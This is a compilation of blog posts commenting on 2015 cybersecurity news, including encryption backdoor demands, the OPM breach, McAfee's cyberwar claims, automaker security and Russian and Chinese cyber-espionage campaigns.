The U.S. Can’t Keep Its Own Data Safe, How Dare It Demand a Back Door to Yours

The US government seemingly has a penchant for being unable to keep its own data safe, so why should the American people trust it with a backdoor into yours? (emphasis added)

The U.S. intelligence apparatus still wants a key to your private data. Specifically, it wants “backdoor,” or “exceptional,” access to encrypted data when a court order is obtained for it. Last week, the nation’s intelligence heads—FBI Director James Comey, CIA Director John Brennan, Director of National Intelligence James Clapper, National Security Agency Director Michael Rogers, and Defense Intelligence Agency Director Vincent Stewart—went before the House Intelligence Committee to lay out the threats and make their asks. After raising the specter of crippling large-scale cyberattacks, Clapper said the more pressing concern was persistent, ongoing small attacks, or as Foreign Policy put it, “Get Ready for Everything to Be Hacked All the Time.” To fight these attacks, Clapper wants streamlined access to the private accounts of Americans—an idea that is unnecessary at best and counterproductive at worst. And the intelligence leaders’ bad ideas didn’t end there

While the increasing regularity of both computing and security breaches makes Clapper’s concerns very real, the approach the intelligence agencies want to take is sorely inadequate. While they spent a long time discussing deterrence and surveillance, Clapper et al. practically ignored the most crucial and central aspect of fighting cyberattacks: security. In light of the recent, catastrophic Office of Personnel Management data breach, which compromised the sensitive personal data of more than 20 million people, Clapper’s sense of priorities, as evidenced by his refusal to call the OPM breach an “attack,” is clearly warped. (“There was no destruction of data or manipulation of data,” he said. “It was simply stolen.”) If sensitive information is a house, then the government wants surveillance cameras everywhere and stiff sentences for thieves, yet can’t be bothered to lock the door.

Instead, Clapper and Comey stressed the need for greater deterrence of cyberattacks: not securing systems, but creating incentives against hacking. Regarding the OPM breach, Clapper said, “Until such time as we do create both the substance and the mindset of deterrence, this sort of thing is going to continue.” There are two things wrong with this statement. First, it’s not easy to attribute these attacks to their perpetrators. Even if the U.S. government is convinced that the OPM attacks originated from China, it likely hasn’t figured out whether they were state-sponsored. The government’s attribution of last year’s Sony Pictures hack to North Korea remains dubious and inconclusive, as I pointed out shortly before everyone forgot about it. In the absence of reliable attribution, deterrence is impossible, because the actor will always have plausible deniability.

According to John McAfee, Cyberwar Is Here, and China Is the Enemy

According to John McAfee, cyberwar[sic] is here, and China is the enemy:

We have to get a clue. We are in the early stages of a cyberwar. As a candidate for President of the very nation under attack, I would be remiss in my duties if I did not shed light on our reality.

I am going to make the following prediction:

On September 25, when Xi Jinping meets President Obama, we will not have a single concrete response to the war that has been declared on us by the Chinese. By “concrete” I mean economic sanctions that take place on the 25th, or other immediate, visible actions. Our president is smart enough to know that the Chinese will merely laugh at any threat of “future” actions, such as “next week we are going to…”

The Chinese have been involved in diplomatic relations for 5,000 years. The U.S. has only existed for less than 250 years. Guess which nation has the advantage here. Any announcement that does not include “starting today, no Chinese cargo ship will be allowed in any U S. port,” or something of similar magnitude, will be seen by the Chinese as confirmation of our idiocy.

If this sounds extreme, then wake up. We are at war.

Well there you have it. Since Mr. John McAfee, Presidential candidate thinks so, I guess the US government needs to get right on it!

Operational Military Commanders Are Finally Beginning to Understand Their Gaps and Weaknesses in Cyber Security

After many years of watching senior leadership ignore cyber, operational military commanders are finally beginning to understand their gaps and weaknesses in cyber security, and the impact this has on mission readiness and effectiveness:

“While we’ve held a decisive and dominant advantage in all the other domains, that’s not necessarily the case in the cyber domain,” Brig. Gen. Robert Skinner, deputy commander of the Joint Force Headquarters-DoD Information Networks, told a conference on Thursday.

“The cost of entry in this domain is very minimal, which enables individuals or groups to generate effects that take a significant expenditure of resources to respond. The value curve is in the wrong direction,” he added.

Skinner’s department was launched in January to shoulder some of the responsibility for cyber operations in the Defense Department.

“We are conducting thousands of defensive operations each and every day … and countering millions of cyberattacks annually,” Skinner said. “We are in constant contact with agile, learning adversaries in cyberspace, and their learning curve has turned upside down.”

Additionally, officials said, the integration of technology, bureaucracy and personnel represent a challenge for the U.S., even as cyberattacks grow.

Lt. Gen. Ed Cardon, the leader of Army Cyber Command, said, “If [we] have all these technologies, but you can’t connect these to a command operation, how are we going to integrate all this stuff so that it accomplishes an effect?”

DHS Is Funding a Boeing Project for Enhanced Biometrics to Be Used as a Means for Device Self-Destruction

DHS is funding a Boeing project for enhanced biometrics to be used as a means for device self-destruction after identifying it is no longer being used by its owner:

The technology powering the devices potentially could identify the user’s walking style, for example. Officials would be alerted if the gait does not match the authorized user’s walk – a red flag the phone might have fallen into the wrong hands, officials said.

The “secret sauce” of the mobile device is a so-called neuromorphic computer chip that simulates human learning, Vincent Sritapan, the program manager for DHS’ mobile device security program, told Nextgov.

Gait recognition — driven by the phone’s accelerometer, GPS and the chip — is but one of many kinds of continuous ID verification intended to tighten access controls on mobile devices.

Boeing and HRL Laboratories, a software firm jointly owned by Boeing and General Motors, are partnering under a DHS project worth $2.2 million over 2.5 years.

The companies “pretty much are leveraging user behavior information” from data gathered by sensors found on any standard consumer smartphone, Sritapan said. Those feelers could include microphones, cameras and touchpads, he added. The artificial intelligence could help agencies determine, “Are you who you say you are, and do we give you access to enterprise resources like email?” he said.

This sounds quite intriguing.

OPM Breach Exposed Fingerprints of 5.6 Million US Government Employees

Another week, another round of bad news about the OPM breach. This time we learn the fingerprints of 5.6 million US government employees was exfiltrated by the ostensible Chinese hackers:

The attack on the agency, which is the main custodian of the government’s most important personnel records, has been attributed to China by American intelligence agencies, but it is unclear exactly what group or organization engineered it. Before Wednesday, the agency had said that it lost only 1.1 million sets of fingerprints among the records of roughly 22 million individuals that were compromised.

“Federal experts believe that, as of now, the ability to misuse fingerprint data is limited,” the agency said in a written statement. But clearly the uses are growing as biometrics are used more frequently to assure identity, in secure government facilities and even on personal iPhones.

The working assumption of investigators is that China is building a huge database of information about American officials or contractors who may end up entering China or doing business with it. Fingerprints could become a significant part of that effort: While a Social Security number or a password can be changed, fingerprints cannot.

Customs and immigration officials frequently fingerprint incoming travelers; millions of fingerprints in a Chinese database would help track the true identities of Americans entering the country.

“I am assuming there will be people we simply can’t send to China,” a senior intelligence official said this summer, before the most recent revelation. “That’s only part of the damage.”

The agency said that an “interagency working group,” with help from the F.B.I., the Department of Homeland Security and the intelligence agencies, “will review the potential ways adversaries could misuse fingerprint data now and in the future.”

The OPM breach is going to be studied for the next few years and will become the premier case study on how not to conduct cyber security. It is amazing they still have not increased their cyber defense capabilities since this all came to light a few short months ago.

Huge Surge in Targeted Cyber Attacks in Japan in 2015

According to a report by the Japanese National Police Agency, there was a huge surge in targeted cyber attacks in Japan in 2015:

The National Police Agency said it recorded 1,472 attacks from January to June, NHK news agency reported.

The agency monitors such attacks in coordination with more than 6,900 defence and nuclear-related firms and others, which are the main targets.

In targeted attacks, emails carrying computer viruses are sent to companies and government offices in a bid to steal classified information. Typically, the virus is hidden in an attached file sent with the e-mail.

The agency said cases in which a Microsoft Word document was used to automatically download an illicit programme accounted for 64 percent of all incidents involving attached files. That’s up from two percent last year.

Two US Senators Are Asking Automobile Manufacturers for Details on Their Cyber Security Strategies

Ever since the proof-of-concept hack against Jeep, automobile cyber security is on peoples minds. This time two US senators are asking automobile manufacturers for details on their cyber security strategies:

Two U.S. senators have asked the world’s biggest automakers for information on steps they have taken to protect cars from being hacked, as attention on vehicle security has surged following the first car recall over a cyber bug.

Democratic Senators Edward Markey and Richard Blumenthal wrote to 18 automakers on Wednesday asking about efforts taken to secure vehicles including 2015 and 2106 models. They asked automakers how they test electronic components and communications systems to ensure attackers cannot gain access to onboard networks.

Concerns about auto cyber security have grown since July, when researchers gained remote control of a moving Jeep, prompting Fiat Chrysler Automobiles (FCAU.N) (FCHA.MI) to recall some 1.4 million vehicles for a software update.

The request from the senators follows a review that Markey began in December 2013. He concluded in a February 2015 report that the spread of technology connecting vehicles to networks had outpaced industry and government efforts to protect vehicles from hackers.

The senators said they want to know what automakers have done since the last survey to beef up security.

Lawmakers Accuse DHS of Stonewalling on Cyber Security Plans

In the this-is-not-a-surprise department, lawmakers accuse DHS of stonewalling on cyber security plans:

“The department has persisted in its ‘go it alone’ mentality and has ignored Congress’ requests for information despite a record that demonstrates its need for oversight and accountability,” added Rep. John Ratcliffe (R-Texas), who chairs the panel’s subcommittee on cybersecurity, infrastructure protection and security technologies.

The DHS has played an increasingly important role in the government’s cybersecurity effort over the last year.

Congress late last year passed a series of bills that strengthened the agency’s cyber workforce and codified certain aspects of the DHS cybersecurity mission.

Lawmakers are currently considering more bills that would further clarify the agency’s cyber role while strengthening its authority to proactively investigate and defend federal networks across the government.

The House Homeland Security Committee is also drafting a bill that would transform the NPPD.

McCaul said the committee would soon hold hearings as lawmakers work to draft the legislation.

“We welcome the department’s input and look forward to working closely with them on streamlining NPPD’s structure,” he said.

The committee’s bill would rename the NPPD to Cybersecurity and Infrastructure Protection. It would also create two positions to oversee the new wing: a deputy undersecretary for cybersecurity and a deputy undersecretary for infrastructure protection.

China May Have Conducted a Cyber Attack Against the Russian Military

Even though Russia has highly advanced cyber attack capabilities, this does not mean they are immune to operations designed to breach their networks. It would seem China may have conducted a cyber attack against the Russian military:

“There is a world market for classified data of any time,” said Epstein. “There are documented cases in the past where private hackers hacked into various institutions and then sold the data to nation states. The lines are increasingly blurred in the world of cybersecurity.”

The attack starts with a well-written Russian-language email that seems to come from someone else in the targeted military division or an analyst section from the same group of the military, he said.

It comes with an attached document, a Microsoft Word file with a published article about the history of military testing in Russia.

“It’s a decoy document,” said Epstein. “You double-click on it, you open it, you read it, you think, ‘Ah, that was kind of interesting.’ Then you close it and you don’t think about it again. But when it closes, it activates a macro, and the macro triggers a secondary file to take action, which is to download a third file, which is the nasty stuff.”

That’s when the malware takes over the computer and everything the user has access to, the attackers now have access to.

“Any anti-virus program wouldn’t see a virus in the document because there’s no virus in the document,” he said. “And the trigger on closing is a common anti-sandboxing technique because most sandboxes check for triggering when documents are opened, not when they are closed.”

This is a fairly standard, yet highly advanced, technique for confusing endpoint anti-virus. This is why layered defenses extend beyond the network and need to be implemented at the endpoint level too. Tools like application whitelisting, host intrusion prevention, and desktop firewalls, when used together, can severely minimize the possibility of these types of malware from successfully executing.

Who here wonders if this attack was actually perpetrated by the United States but made to appear as if China is responsible?

Seven Years of Malware Linked to Russian State-Backed Cyber-Espionage Group

An apparently state-backed cyber-espionage group based in Russia has conducted a targeted malware campaign targeting foreign governments over the course of the past seven years:

For the past seven years, a cyber-espionage group operating out of Russia—and apparently at the behest of the Russian government—has conducted a series of malware campaigns targeting governments, political think tanks, and other organizations. In a report issued today, researchers at F-Secure provided an in-depth look at an organization labelled by them as “the Dukes,” which has been active since at least 2008 and has evolved into a methodical developer of “zero-day” attacks, pulling together their own research with the published work of other security firms to provide a more detailed picture of the people behind a long-running family of malware.

Characterized by F-Secure researchers as a “well resourced, highly dedicated and organized cyberespionage group,” the Dukes have mixed wide-spanning, blatant “smash and grab” attacks on networks with more subtle, long-term intrusions that harvested massive amounts of data from their targets, which range from foreign governments to criminal organizations operating in the Russian Federation. “The Dukes primarily target Western governments and related organizations, such as government ministries and agencies, political think tanks and governmental subcontractors,” the F-Secure team wrote. “Their targets have also included the governments of members of the Commonwealth of Independent States; Asian, African, and Middle Eastern governments; organizations associated with Chechen terrorism; and Russian speakers engaged in the illicit trade of controlled substances and drugs.”

The first known targets of the Dukes’ earliest-detected malware, known as PinchDuke, were some of the first known targets and were associated with the Chechen separatist movement. By 2009 the Dukes were going after Western governments and organizations in search of information about the diplomatic activities of the United States and the North Atlantic Treaty Organization. While most of the attacks have used spear phishing e-mails as the means of injecting malware onto targeted systems, one of their attacks has spread malware through a malicious Tor exit node in Russia, targeting users of the anonymizing network with malware injections into their downloads.